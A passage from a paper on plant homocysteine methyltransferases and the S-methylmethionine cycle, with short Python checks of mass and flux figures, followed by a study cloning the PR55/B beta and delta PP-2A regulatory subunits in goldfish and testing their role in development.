Diastereospecificity of Methyl Transfer in the SMM Cycle-Because HMT is known to transfer the pro-R methyl group of SMM to Hcy (14), we used recombinant AtHMT-1 to determine the diastereospecificity of MMT, the other enzyme of the SMM cycle. To do this, L-[U-13C5]Met and unlabeled AdoMet were used as substrates for recombinant Arabidopsis MMT; the SMM formed in this reaction was then incubated with unlabeled L-Hcy and AtHMT-1. The resulting 13C-labeled Met was analyzed by electrospray MS, together with a 1:1 mixture of unlabeled Met and L-[U-13C5]Met for comparison (Fig. 6). The product of the MMT/HMT reactions gave peaks of almost equal intensity at m/z 151 and 154, corresponding to [13C1]Met and [13C4]Met, and no appreciable signal above that expected for natural abundance 13C or for residual 12C in the original [13C5]Met substrate (Fig. 6B). These data show that MMT introduces a methyl group into the pro-S position of SMM, i.e. that MMT and HMT have opposite stereoselectivities.
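The reported m/z values follow directly from the composition of protonated methionine (C5H11NO2S); the quick check below uses standard monoisotopic masses, which are not given in the paper.

```python
# Sanity check of the m/z values for protonated methionine (C5H11NO2S).
# Standard monoisotopic masses (assumed constants, not from the paper).
MASSES = {"C": 12.0, "H": 1.00783, "N": 14.00307, "O": 15.99491,
          "S": 31.97207}
C13_SHIFT = 1.00336   # mass difference between 13C and 12C
PROTON = 1.00728      # mass added on protonation -> [M+H]+

met = (5 * MASSES["C"] + 11 * MASSES["H"] + MASSES["N"]
       + 2 * MASSES["O"] + MASSES["S"])

for n_13c in (0, 1, 4, 5):
    mz = met + PROTON + n_13c * C13_SHIFT
    print(f"[13C{n_13c}]Met [M+H]+ ~ m/z {round(mz)}")
# -> 150, 151, 154, 155; the 151/154 pair is the one observed for the
#    MMT/HMT product (one vs four labeled carbons).
```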
Genomic Complexity and Relationships of HMT Genes in Arabidopsis-Southern blot analyses carried out at low stringency indicated that both AtHMT-1 and AtHMT-2 are encoded by single genes (Fig. 7, A and B). Consistent with this result, BLAST searches of the Arabidopsis genome (≈84% complete at the time of searching) revealed a chromosome III sequence specifying AtHMT-1 (AB023041, nucleotides 21893-23610) but no other closely related sequences. Molecular phylogenic analysis (Fig. 7C) of the sequences aligned in Fig. 2 suggests (a) that AtHMT-2 and Astragalus SecysMT belong on a branch distinct from AtHMT-1, and (b) that extant HMTs are derived from a single ancestral gene that existed prior to the divergence of eubacteria and eukaryotes and has undergone independent duplications in plant and yeast lineages. (Fig. 7 legend, recovered in part: genomic DNA was probed with the AtHMT-1 cDNA (A) or the AtHMT-2 cDNA (B); washing was at low stringency; the sizes of hybridizing bands match the cDNAs with respect to the predicted restriction sites; genomic reconstruction standards made with AtHMT-1 and -2 cDNAs equivalent to 1 and 5 copies/haploid genome are shown on the left of each panel; AtHMT-1 and -2 cDNAs cross-hybridize only very weakly, as they differ at 55% of the base pairs; the positions of DNA size markers (kb, kilobase) are marked; abbreviations are as in Fig. 2; C shows a molecular phylogenic tree of the protein sequences from Fig. 2.)
DISCUSSION
The identification of cDNAs encoding plant HMTs completes the set of genes required for operation of the SMM cycle, the others being MMT and AdoHcy hydrolase (3). This opens the way to comprehensive studies of the expression of these genes and to the systematic application of reverse genetics to probe the function of SMM and its cycle. Furthermore, extracts of E. coli expressing AtHMT-1 or -2 have specific activities ≥10²-fold higher than those of the best plant sources (12, 13), making them good material for future enzyme purification. More generally, the HMT cDNAs reported here appear to be the first identified from a eukaryote.
AtHMT-1 and -2 resemble HMTs from other organisms in overall primary structure and in being monomeric proteins. They lack obvious targeting sequences and are therefore presumably cytosolic enzymes. HMT has yet to be definitively localized in plant cells, but preliminary work with pea leaves indicates that it is cytosolic,3 as are other enzymes involved in Met metabolism, i.e. MMT, Met synthase, AdoMet synthetase, and AdoHcy hydrolase (8, 32). AtHMT-1 and -2 share with other HMTs and with SecysMT a GGCC zinc-binding motif (18), plus a third conserved cysteine residue. This strongly suggests that they have a zinc cofactor. Neither enzyme was stimulated by zinc or severely inhibited by EDTA, but this may be because the zinc is tightly bound, as it is in betaine-Hcy methyltransferase (19).
Our results demonstrate that the physiological S,S diastereomer of AdoMet is a substrate for plant HMTs. This indicates that plants have the potential to bypass SMM by transferring methyl groups directly from AdoMet to Hcy (Fig. 1, dotted arrows), and the complementation experiments with yeast confirm that plant HMTs can mediate this reaction in a foreign host. But how much flux does this bypass actually carry in planta? Kinetic considerations indicate that it may be very little, especially in tissues where AtHMT-1 is the predominant isoform. AtHMT-1 has Km values for SMM and AdoMet of 29 and 1950 μM, respectively, and the Vmax value with SMM is 2.8-fold higher. SMM levels are reported to range from about 5 to >300 nmol g⁻¹ fresh weight in various tissues, and SMM/AdoMet ratios are reported to range from ≈1 to >30 (1, 8, 33-36). Some SMM may be sequestered in the vacuole; however, radiotracer kinetic studies indicate that the metabolically active (presumably cytosolic) SMM pool is a large fraction of the total (36). Assuming the cytosol to be ≈5% of tissue water volume (37), it follows from these data that typical cytosolic SMM concentrations are likely to be ≥100 μM, and AdoMet concentrations are likely to be similar or lower. In such conditions flux through the AdoMet-driven reaction would be ≤3% of that through the SMM-driven reaction. Simply put, a high prevailing SMM concentration can deny AdoMet access to the AtHMT-1 active site and thereby suppress futile cycling of AdoMet.
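The ≤3% figure can be sanity-checked with a short calculation. The sketch below assumes simple competing-substrate Michaelis-Menten kinetics at the AtHMT-1 active site, using the Km values and the 2.8-fold Vmax ratio quoted above, with both substrates set to the illustrative 100 μM cytosolic estimate.

```python
# Relative flux of the AdoMet- vs. SMM-driven HMT reaction when both
# substrates compete for the same active site (competing-substrate
# Michaelis-Menten kinetics). Km values and the 2.8-fold Vmax ratio come
# from the text; the 100 uM concentrations are the cytosolic estimates
# discussed above.
Km_SMM, Km_AdoMet = 29.0, 1950.0      # uM, AtHMT-1
Vmax_SMM, Vmax_AdoMet = 2.8, 1.0      # relative units (Vmax ratio = 2.8)
S_SMM, S_AdoMet = 100.0, 100.0        # uM, assumed cytosolic concentrations

denom = 1.0 + S_SMM / Km_SMM + S_AdoMet / Km_AdoMet
v_SMM = Vmax_SMM * (S_SMM / Km_SMM) / denom
v_AdoMet = Vmax_AdoMet * (S_AdoMet / Km_AdoMet) / denom

print(f"AdoMet flux / SMM flux = {v_AdoMet / v_SMM:.3%}")  # ~0.5%, well below 3%
```

At equal concentrations the AdoMet-driven flux comes out near 0.5% of the SMM-driven flux, consistent with the ≤3% bound stated above.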
Our finding that AtHMT-1 is strongly inhibited by Met is novel, because the plant HMTs so far known are Met-insensitive (12, 13). Met sensitivity may be crucial to the control of flux through the HMT reaction and the SMM cycle. A Met-sensitive HMT could stop the cycle turning when Met levels are elevated, whereas a Met-insensitive enzyme could allow SMM → Met conversion even when Met levels are high. It is therefore noteworthy that free Met levels in developing seeds can greatly exceed those in other tissues (≥400 versus 10-30 nmol g⁻¹ fresh weight) (1, 35, 38-40) and that HMTs isolated from seeds are Met-insensitive (12, 13). Moreover, DNA array data indicate that the predominant HMT expressed in developing Arabidopsis seeds is the Met-insensitive AtHMT-2.4 Another difference between the Arabidopsis HMTs is that AtHMT-1 attacks cysteine. This could explain the origin of S-methylcysteine in the Brassicaceae. No enzyme that catalyzes the S-methylation of cysteine has hitherto been demonstrated (1), although radiotracer data show that the reaction occurs in vivo (41).

(Legend to Fig. 7, displaced: ... AtHMT-2 cDNA (B). Washing was at low stringency. The sizes of hybridizing bands match the cDNAs with respect to the predicted restriction sites. Genomic reconstruction standards were made with AtHMT-1 and -2 cDNAs equivalent to 1 and 5 copies/haploid genome (shown on the left of each panel). Note that AtHMT-1 and -2 cDNAs cross-hybridize only very weakly as they differ at 55% of the base pairs. The positions of DNA size markers (kb, kilobase) are marked. Abbreviations are as in Fig. 2. C shows a molecular phylogenic tree of the protein sequences from Fig. 2.)
The SMM cycle has been proposed to rectify overshoots in the conversion of free Met to AdoMet, thereby sustaining a free Met pool for protein synthesis (3). This hypothesis was based largely on data for whole Lemna plantlets (3), and it has since been found that SMM is transported between organs in the phloem (8). This raises the question of whether the SMM was produced and utilized in the same organs in the Lemna experiments and shows that accurate flux measurements are now needed to clarify the functions of the SMM cycle. Only a few such measurements have been made, and these come from unusual plants (W. biflora and Spartina alterniflora) that convert SMM to DMSP. Isotope tracer studies of SMM synthesis and metabolism in leaves of these plants showed that the methyl flux from Met to SMM was high, but there was little or none from SMM to Hcy, i.e. the SMM cycle turned slowly if at all (36,42). The approach used to make these measurements depends on the metabolism of SMM to DMSP and so unfortunately cannot be applied to the great majority of plants that do not synthesize DMSP.
There is thus a need for methods to estimate flux through the SMM cycle in tissues of non-DMSP-accumulating plants. Our finding that the enzymes of the cycle have opposing stereoselectivities suggests a novel way to do this. For example, consider an organ that imports SMM via the phloem and ultimately uses it to produce Met that is used for protein synthesis. If the SMM cycle is not operating, then supplied SMM that has a ¹³C label in the C₄ backbone and the pro-R methyl and a ²H₃ label in the pro-S methyl will give rise to only two labeled species of Met in proteins: [methyl-²H₃,¹³C₄]Met and [methyl-¹³C]Met. However, if the SMM cycle is operating, the additional species [methyl-²H₃]Met, [¹³C₄]Met, and [¹³C₅]Met will be found in proteins and will become relatively more abundant with each turn of the cycle. | 2018-04-03T01:57:04.548Z | 2000-05-26T00:00:00.000 | {
"year": 2000,
"sha1": "2e003ff87b53d3475d7083efced0d62e18d8ab68",
"oa_license": "CCBY",
"oa_url": "http://www.jbc.org/content/275/21/15962.full.pdf",
"oa_status": "HYBRID",
"pdf_src": "Highwire",
"pdf_hash": "64eb5d7c40397c7e7f82f8f40e0aafbaa7ea2524",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Medicine",
"Biology"
]
} |
18652571 | pes2o/s2orc | v3-fos-license | Molecular Cloning of the Genes Encoding the PR55/Bβ/δ Regulatory Subunits for PP-2A and Analysis of Their Functions in Regulating Development of Goldfish, Carassius auratus
The protein phosphatase-2A (PP-2A), one of the major phosphatases in eukaryotes, is a heterotrimer consisting of a scaffold A subunit, a catalytic C subunit and a regulatory B subunit. Previous studies have shown that besides regulating specific PP-2A activity, the various B subunits, encoded by more than 16 different genes, may have other functions. To explore the possible roles of the regulatory subunits of PP-2A in vertebrate development, we have cloned the PR55/B family regulatory subunits β and δ and analyzed their tissue-specific and developmental expression patterns in goldfish (Carassius auratus). Our results revealed that the full-length cDNA for PR55/Bβ consists of 1940 bp with an open reading frame of 1332 nucleotides coding for a deduced protein of 443 amino acids. The full-length PR55/Bδ cDNA is 2163 bp, containing an open reading frame of 1347 nucleotides encoding a deduced protein of 448 amino acids. The two isoforms of PR55/B display high levels of sequence identity with their counterparts in other species. The PR55/Bβ mRNA and protein are detected in brain and heart. In contrast, PR55/Bδ is expressed in all 9 tissues examined at both mRNA and protein levels. During development of goldfish, the mRNAs for PR55/Bβ and PR55/Bδ show distinct patterns. At the protein level, PR55/Bδ is expressed at all developmental stages examined, suggesting its important role in regulating goldfish development. Expression of the PR55/Bδ anti-sense RNA leads to significant downregulation of PR55/Bδ protein and causes severe abnormality in goldfish trunk and eye development. Together, our results suggest that PR55/Bδ plays an important role in governing normal trunk and eye formation during goldfish development.
Introduction
The reversible phosphorylation of proteins is an important posttranslational modification in eukaryotes [1][2][3] and an essential mechanism regulating the functions of more than 30% of total cellular proteins. 4,5 The protein phosphatase-2A (PP-2A) is one of the major phosphatases in eukaryotes, contributing more than 50% of serine/threonine phosphatase activity and participating in many cellular processes such as signal transduction, gene expression, neurotransmission, cell cycle control, cell transformation and senescence. [1][2][3][4][5][6][7] In this regard, our recent studies have indicated that PP2A is associated with carcinogenesis 8,9 and is highly regulated in ocular tissues. [10][11][12] The holoenzyme of PP-2A is a heterotrimer, consisting of a scaffold A subunit, a catalytic C subunit and a regulatory B subunit. [13][14][15][16] While the A and C subunits exist in two isoforms encoded by different genes, the B subunits exist in approximately 26 different isoforms and are encoded by four subfamilies of genes (B or PR55, B' or PR61, B'' or PR72, and B''' or PR93/PR110), each family consisting of multiple genes, with each gene generating multiple splice variants. 13,14 These B subunits exhibit differential subcellular localization as well as tissue-specific and developmentally-regulated expression patterns. Variations in the expression pattern and cellular localization of B subunits provide substrate specificity, which is thought to be the molecular basis for the appropriate regulation of numerous cellular processes. 1,2,[5][6][7]13,14 The major function of the regulatory subunits of PP-2A is to provide specific PP-2A activity in different cellular compartments and different tissues of organisms. 1,2,[5][6][7]13,14 In addition, these regulatory subunits may have other functions independent of PP-2A. For example, SG2NA, a member of the B''' or PR93/110 family, has been shown to act as a molecular scaffold to promote localization of the estrogen receptor to the plasma membrane and organize the ER-eNOS membrane signaling complex in endothelial cells. 17 In addition, it has been found that CKA, the Drosophila orthologue of SG2NA, can form a physical complex with several kinases, including HEP and BSK, and with components of the AP-1 family, including JUN and FOS. 18,19 To further explore the independent functions of the regulatory subunits of PP-2A, we have cloned two members of the PR55/B family from goldfish and established their tissue-specific and developmental expression patterns. Moreover, we have designed an antisense expression construct to block translation of the δ isoform and demonstrated that injection of the anti-sense RNA of PR55/Bδ significantly downregulates the expression of this regulatory subunit at several developmental stages. Furthermore, inhibition of PR55/Bδ expression via anti-sense RNA-mediated blockage of translation caused a severe phenotype in the developing goldfish embryos, including microphthalmia (small eye) and abnormal trunk. Thus, our results demonstrate that PR55/Bδ plays an important role in regulating vertebrate organogenesis.
Materials and Methods

Animals
Goldfish aged 6 months to one year were collected from the Experimental Fish Culture Facility of the Key Laboratory of the Educational Ministry of China at Hunan Normal University. Fertilization was conducted in the laboratory.
Chemicals
The RNA extraction kit was purchased from Omega, the reverse transcription kit from Invitrogen, Inc., and the protein size marker from Fermentas. The 5′- and 3′-RACE cloning kits were obtained from Clontech, Inc. The PCR Taq polymerase and the pMD18-T vector were purchased from Takara, Inc. The antibodies used for this study were purchased from Santa Cruz Biotechnology and from Sigma, Inc. The gel purification kit and all oligo primers were provided by Sangon, Inc.
Collection of tissues and embryos
Goldfish were sacrificed through removal of the gill tissue. Various tissues including liver, spermary (testis), ovary, brain, kidney, heart, muscle, gill and fin were quickly dissected out on ice and then frozen in liquid nitrogen for homogenization, first with a mortar and then with a 1 ml syringe (18.5 G and 23.5 G needles passed). Artificial fertilization was conducted in Hoff's solution (0.1 g CaCl2, 0.05 g KCl, 3.5 g NaCl dissolved in 1000 ml distilled H2O). The fertilized egg membranes were removed with 0.4% pancreatic protease and the de-membraned eggs were allowed to develop at 22 °C in Hoff's solution. Under microscopic examination, developing embryos at the stages of 2-cell, multiple-cell, blastula, gastrula, neurula, optic vesicle, brain differentiation, muscle differentiation, heart beat, eye pigmentation, body pigmentation and hatching larvae were collected and frozen in liquid nitrogen. The frozen embryos were homogenized for extraction of total RNA and proteins as described below.
Molecular cloning of the PR55/B family of PP2A

The two cDNAs for PR55/Bβ/δ were cloned using 5′-RACE and 3′-RACE as previously described. 9,20 Briefly, the specific primers used to clone these cDNAs were designed using Jellyfish and Primer 5.0 software and are shown in Table 1. Homology-based reverse transcriptase-polymerase chain reaction (RT-PCR) cloning was used to isolate partial B subunit cDNAs from total adult goldfish brain RNA. Additional 5′ sequences for B subunits were obtained by 5′ rapid amplification of cDNA ends (5′-RACE) from goldfish brain RNA according to instructions supplied with the Marathon cDNA amplification kit (Clontech, Inc.). 3′-RACE was performed using a 3′-RACE kit.
Reverse transcription-linked polymerase chain reaction (RT-PCR)
Reverse transcription was conducted with a kit from Invitrogen (Invitrogen #18085-019) as previously described. 8,9,[20][21][22] Briefly, 2 µg of total RNA were used in a total reaction volume of 20 µl, and 2 µl of the reverse transcription reaction mixture were used for the PCR reaction. To detect the mRNA expression of PR55/Bβ/δ, three pairs of specific primers as well as the β-actin primers (Table 1) were used. For PCR amplification, both the specific primers and the β-actin primers were added into the same reaction at the beginning of PCR, and the PCR reaction was continued for 30 cycles. At the end of each reaction, the PCR products were separated by agarose gel (1.5%) electrophoresis and photographed under UV illumination.
Western blot analysis
Western blot analysis was conducted as previously described. [8][9][10]23 Briefly, 50 or 100 µg of total proteins from various tissues and from each developmental stage of embryos were separated by 10% SDS-polyacrylamide gel electrophoresis and transferred onto nitrocellulose membranes (Bio-Rad). The protein blots were blocked with 5% milk in TBS (10 mM Tris, pH 8.0; 150 mM NaCl) for 60 minutes at room temperature. Then, each blot was incubated with the anti-B55β/δ antibodies (Santa Cruz Biotechnology) at a dilution of 1:100 in 5% milk prepared in TBS overnight at 4 °C with mild shaking. After washing 3 times with TBS-T (TBS with 0.05% Tween-20), 15 minutes each, the blot was incubated with a secondary antibody (anti-rabbit IgG from Santa Cruz Biotechnology) at a dilution of 1:1000 for 45 minutes. After washing twice with TBS-T and once with TBS (15 minutes each), the PR55 proteins were detected with an enhanced chemiluminescence detection kit according to the instruction manual from Amersham.
As a reference, after stripping the previous antibody, the blot was re-hybridized with the anti-β-actin primary antibody (1:2000, from Sigma, Inc.). After washing with TBS-T 3 times, the blot was incubated with the anti-mouse IgG (secondary antibody from GE Health Care, Inc., diluted 1:1000). After washing twice with TBS-T and once with TBS, the β-actin level was detected as described above.
Quantitation of RT-PCR and Western blot results
After RT-PCR, the relative density of each specific band versus the β-actin control band was quantitated as described before. 24 Both RT-PCR and Western blot results on the x-ray films were analyzed with the Automated Digitizing System from Silk Scientific Corporation. The relative expression levels (fold) were calculated by dividing the total pixel count of each band under investigation by the total pixel count of the corresponding β-actin band. The quantitative data were averaged from three independent experiments and statistics were analyzed by Student's t-test.

(Table 1. Oligo primers used for RT-PCR analysis to detect expression of PR55/Bβ/δ. Columns: forward primer, reverse primer.)
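As an illustration of this quantitation scheme, a minimal sketch follows; the pixel densities and the comparison group are hypothetical placeholders, and SciPy's ttest_ind stands in for the Student's t-test described above.

```python
# Minimal sketch of the band quantitation described above: each target
# band's total pixel density is normalized to the corresponding beta-actin
# band, and replicate fold values are compared with Student's t-test.
# All pixel values below are hypothetical placeholders.
from scipy import stats

target_pixels = [12500, 13100, 12800]    # three independent experiments
actin_pixels = [25000, 24800, 25500]
fold = [t / a for t, a in zip(target_pixels, actin_pixels)]

control_fold = [0.30, 0.32, 0.29]        # hypothetical comparison group
t_stat, p_value = stats.ttest_ind(fold, control_fold)
print(f"mean fold = {sum(fold)/len(fold):.3f}, p = {p_value:.4f}")
```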
Preparation of antisense expression construct for PR55/Bδ
The full-length cDNA for PR55/Bδ was cloned into the pEGFP vector in the reverse direction so that the anti-sense strand would be expressed under the direction of the viral promoter, as previously described. 25 The pEGFP vector alone was used as mock.
Injection of plasmids and observation of injected embryo development
Both the empty vector and the anti-sense expression vector were amplified in DH-5α and then purified with a maxi plasmid purification kit (Qiagen) according to the instruction manual. 500 ng of purified plasmid in 0.05 µl were injected into each fertilized egg using a microinjector developed by Shanghai Instrument, Inc. The vector-injected embryos and the antisense expression construct-injected embryos were allowed to develop at 22 °C in Hoff's solution. Wounded embryos were removed from the experiments. The phenotypes at each developmental stage were recorded with microscopy (Table 2).
Results

Molecular cloning of the PR55/Bβ/δ cDNAs of PP-2A from goldfish
Using a molecular cloning strategy as previously described, 9,20 the full-length cDNAs for PR55/Bβ and PR55/Bδ were isolated. These cDNA sequences were deposited in the GenBank database under accession numbers FJ356012 and FJ356011 for PR55β and PR55δ, respectively. Sequence analysis revealed that the full-length PR55/Bβ cDNA consists of 1940 bp, with an open reading frame of 1332 nucleotides coding for a deduced protein of 443 amino acids (Fig. 1A). Amino acid sequence alignment showed that goldfish PR55β shares high levels of identity with its counterparts from African clawed frog (88.4%), mouse (92.2%) and human (92.5%) (Figs. 1B and 3B). The full-length PR55/Bδ cDNA contains 2163 bp with an open reading frame of 1347 nucleotides, which encodes a deduced protein of 448 amino acids (Fig. 2A). Amino acid sequence alignment demonstrated that the goldfish PR55δ protein shares a sequence identity of 98.4%, 87.7%, 86.9%, 86.9% and 86.9% with its counterparts from zebrafish, western clawed frog, chicken, mouse and Norway rat, respectively (Figs. 2B and 3C).
Analysis of the amino acid sequences of the deduced PR55/Bβ/γ/δ proteins of PP-2A with both ExPASy and the conserved domain architecture retrieval tool (DART) revealed the presence of WD-40 tandem repeats in all three isoforms (boxed regions in Figures 1A and 2A, and data not shown), indicating their functional importance for binding to the scaffold subunits of PP-2A. 12,15,16,21,22,26 Moreover, a sequence identity of 80.8% between PR55/Bβ and PR55/Bδ was found (Fig. 3A). In addition, the N-termini of PR55/Bβ and PR55/Bδ are significantly diversified (Fig. 3A).
Tissue-specific expression of PR55/B family members
To explore the potential functions of PR55/B family members in various tissues of a lower vertebrate, we examined the mRNA levels of PR55/Bβ/δ of PP-2A in liver, spermary, ovary, brain, kidney, heart, muscle, gill and fin from goldfish using reverse transcription-linked polymerase chain reaction (RT-PCR) analysis. As shown in Figure 4A, a 370 bp cDNA band was amplified using specific primers for PR55/Bβ in two tissues: a high level of expression in brain and a low level of expression in heart. Similarly, a single band of 372 bp was amplified in all tissues examined for PR55/Bδ (Fig. 4B). Among these tissues, brain, ovary and kidney contained the highest levels of PR55/Bδ mRNA expression (Fig. 4B). In comparison with brain, ovary and kidney, muscle and heart displayed a slight decrease in PR55/Bδ mRNA expression, and fin, gill, spermary and liver showed a further decrease.
To further explore the tissue-specific distribution of PR55/Bβ/δ, we conducted Western blot analysis. As shown in Figure 5A, PR55/Bβ protein was detected at a relatively high level in brain tissue but was much attenuated in heart. No other tissue had detectable PR55/Bβ protein. In contrast to PR55/Bβ, PR55/Bδ was highly expressed in brain and heart, moderately expressed in liver, spermary, ovary, muscle, fin and gill, with the lowest level detected in kidney (Fig. 5B).
Developmental expression patterns of PR55/Bβ/δ
To explore the possible functions of PR55/Bβ/δ during goldfish development, we first determined their developmental expression patterns at both mRNA (Fig. 6) and protein (Fig. 7) levels. Through RT-PCR analysis, we demonstrated that the PR55/Bβ mRNA level was relatively low from the two-cell and multiple-cell through the blastula stage. The mRNA level increased substantially but transiently at the gastrula stage, then dropped at the neurula stage. From the optic vesicle stage, through brain and muscle differentiation, to heart beat, the PR55/Bβ mRNA gradually increased, and it remained relatively stable at this level through the next four developmental stages (Fig. 6A). Different from the expression pattern of PR55/Bβ mRNA (Fig. 6A), the PR55/Bδ mRNA displayed its highest level at the first three stages of development, dropped slightly from the gastrula to neurula stages, gradually increased from the optic vesicle stage to the brain differentiation stage, was maintained at this level at the muscle differentiation and heart beat stages, and gradually decreased from eye pigmentation to the hatching larval stage (Fig. 6B).
To further examine the developmental expression of PR55/Bβ/δ at the protein level, we conducted Western blot analysis. As shown in Figure 7A, PR55/Bβ protein was undetectable at every stage of development. In contrast, PR55/Bδ protein was maintained at similar levels in the stages examined: multiple-cell, blastula, gastrula, neurula, optic vesicle, brain differentiation, eye pigmentation, body pigmentation and hatching (Fig. 7B).
Attenuation of PR55/Bδ protein expression led to severe abnormality in eye development of goldfish

To further confirm the role of the PR55/B family subunit in regulating development of goldfish, we constructed an expression construct for the generation of anti-sense RNA from the PR55/Bδ cDNA. Basically, the full-length cDNA of PR55/Bδ was ligated into the pEGFP-C3 vector in the non-coding direction so that the anti-sense RNA would be generated when injected into fertilized eggs. The empty vector was used as mock injection. Expression of the antisense PR55/Bδ RNA substantially attenuated the level of PR55/Bδ protein at the several developmental stages examined (Figs. 8A and 8B). When the PR55/Bδ protein level was significantly downregulated, the developing goldfish displayed a severe phenotype in both trunk and eye (Fig. 8D) in comparison with normal larvae (Fig. 8C). The trunk was severely bent and the eye appeared much smaller (microphthalmia) (Fig. 8D, Table 2) in comparison with vector-injected embryos (Fig. 8C). Thus, our results demonstrate that PR55/Bδ is important for goldfish organogenesis, especially of the trunk and the eye.
Discussion
In the present study, we have demonstrated: 1) the goldfish PR55/Bβ/δ cDNAs contain ORFs of 1332 bp and 1347 bp, coding for deduced proteins of 443 (PR55/Bβ) and 448 (PR55/Bδ) amino acids, respectively; 2) the deduced goldfish PR55/Bβ protein shares an amino acid identity of 88.4%, 92.5% and 92.5% with that from frog, mouse and human, respectively, and the deduced goldfish PR55/Bδ protein shares an amino acid identity of 98.4%, 87.7%, 86.9%, 86.9% and 86.9% with that from zebrafish, frog, chicken, mouse and rat, respectively; 3) the PR55/Bβ mRNA is present in brain and heart only, whereas the PR55/Bδ mRNA is present in all tissues examined; and 4) contrasting expression patterns of PR55/Bβ/δ are present in lower and higher vertebrates. The protein phosphatase-2A (PP-2A) is one of the major phosphatases in eukaryotes, and the holoenzyme of PP-2A is a heterotrimer, which contains a scaffold A subunit, a catalytic C subunit and a regulatory B subunit. [1][2][3][4][5][6][7] Both A and C subunits exist in two isoforms which are encoded by different genes. In contrast, the B subunits exist in 26 or more isoforms and, so far, four subfamilies of genes, PR55/B, PR61/B', PR72/B'', and PR93/PR110/B''', have been identified to code for these different isoforms. 1,2,6,15,16 In the present studies, we have isolated two members of the PR55/B family from goldfish.

(Legend to Figure 3: A) Amino acid sequence alignment of the PP2A-PR55/B family members β/γ/δ in goldfish (the partial amino acid sequence for PR55/Bβ is unpublished data from Zhao et al). The completely conserved regions among the three isoforms are marked by black shadow, less conserved regions by grey shadow, and non-conserved regions by a white background. B) and C) The corresponding phylogenetic trees of PR55/Bβ (B) and PR55/Bδ (C) from four (B) or six (C) vertebrates. The phylogenetic tree for PR55/Bβ (B) was generated through comparative analysis of the coding sequences from human, mouse, frog and the present study using the UPGMA method in the MEGA3.1 software. The phylogenetic tree for PR55/Bδ (C) was generated using the same strategy and software through comparative analysis of the coding sequences from mouse, rat, chicken, frog, zebrafish and the present study.)

Although each member of the goldfish
PR55/B family shares high levels of amino acid identity (from 70% to 98%) with its counterpart from other vertebrates (Fig. 3), their expression patterns may be substantially different in different vertebrates. In the present study, we demonstrate that the goldfish PR55/Bβ mRNA is mainly expressed in the brain and to a much lesser degree in the heart. However, in mouse and rat, it is mainly expressed in testis and to a lesser degree in brain. 27,28 For the expression pattern of PR55/Bδ, there is a significant difference between goldfish and mouse. While in goldfish PR55/Bδ mRNA is expressed in all tissues examined, with the highest levels found in brain, ovary and kidney and the lowest levels in liver and testis (spermary), a high level of PR55/Bδ mRNA is detected only in mouse testis; the remaining tissues either have very little PR55/Bδ mRNA (kidney, muscle, liver and brain) or no PR55/Bδ mRNA (lung, spleen and heart). [27][28][29] Thus, goldfish (a lower vertebrate) and mouse (a higher vertebrate) display a distinct difference in the tissue-specific expression patterns of PR55/Bβ/δ.
In the present study, we found that the PR55/Bβ mRNA was present at low levels at the first 3 stages and then became clearly upregulated at the gastrulation stage. After a brief downregulation at the neurula and optic vesicle stages, the PR55/Bβ mRNA gradually increased from the optic vesicle to the heart beat stage and then was maintained at this level, with some slight fluctuations, over the next three stages.

(Legend to Figure 5, displaced: ... as described in Methods. Bottom panel: quantitative results of PR55/Bβ protein in the above 9 tissues of the adult goldfish from three independent experiments. Note that the highest expression level of the PR55/Bβ protein was detected in the brain, and a much lower level in the heart. B) Up panel: 100 µg of total proteins extracted from the 9 different tissues of the adult goldfish were subjected to Western blot analysis as described in A. Bottom panel: quantitative results of PR55/Bδ protein in the above 9 tissues of the adult goldfish from three independent experiments. Note that the highest expression levels of the PR55/Bδ protein were detected in the brain and heart, a reduced level of this protein was detected in liver, spermary, ovary, fin and gill, and a much reduced PR55/Bδ protein expression was found in kidney.)

Similar to
the temporal mRNA expression pattern in goldfish, the PR55/Bβ mRNA was also detected in the mouse embryo, as early as embryonic day 11 (ED11). This mRNA level gradually increased from ED11 to ED17. 28 In contrast to the goldfish PR55/Bβ mRNA expression pattern, we hardly detected any PR55/Bβ protein expression at the 12 different developmental stages examined. These results suggest that the PR55/Bβ mRNA may be non-translatable and that the specific PP-2A activity with PR55/Bβ as regulatory subunit may not be necessary for goldfish development. Whether the PR55/Bβ mRNA in the mouse embryo yields any detectable protein remains to be explored. On the other hand, we cannot exclude the possibility that a low level of PR55/Bβ protein exists that cannot be detected with the antibody we used in the presence of a large portion of yolk protein in the goldfish embryo. Different from PR55/Bβ, PR55/Bδ is highly expressed at both mRNA and protein levels from early to later developmental stages of goldfish. This temporal pattern is also different from that in mouse, where no PR55/Bδ transcripts could be detected until ED17. 28 Such a distinct difference in temporal expression patterns between lower and higher vertebrates suggests that PR55/Bδ plays an important role in regulating development of the goldfish embryo but not the mouse embryo before ED17.
The discrepancy between the mRNA and protein levels for PR55/Bδ in goldfish kidney (Figs. 5 and 6) remains to be explained. 30 It has been shown that Drosophila mutants with reduced levels of PR55 expression display pleiotropic phenotypes. 31 Although three mutant alleles, aar1, aar2 and twinsP, derived from the insertion of different P-elements at the same position within the PR55 gene, all show mitotic abnormalities in anaphase, aar1 displays abnormality in the larval brain, aar2 is female sterile, and twinsP shows imaginal disc abnormality. [32][33][34] The imaginal disc duplication observed in twinsP is derived from complete loss of PR55/B expression. 34

(Legend to Figure 7, displaced: quantitative results of PR55/Bδ protein at the 8 developmental stages, determined using the methods described in Figure 5.)

Anti-sense RNA hybridizes with its complementary mRNA and blocks translation of the latter. 35 It has been extensively used for suppression of endogenous gene expression. [36][37][38] Western blot analysis confirmed that expression of the anti-sense RNA substantially attenuated the protein expression level of PR55/Bδ in goldfish embryos at different developmental stages (Figs. 8A and 8B). When PR55/Bδ is downregulated, the development of goldfish embryos displays severe abnormality in organogenesis. We observed that, during the differentiation stage, while expression of the vector (mock) had little effect on eye development, expression of the antisense PR55/Bδ RNA led to microphthalmia and abnormal trunk in the majority of embryos with reduced PR55/Bδ expression (Table 2). These results provide the first evidence that a regulatory subunit of PP-2A directly controls eye and trunk development.
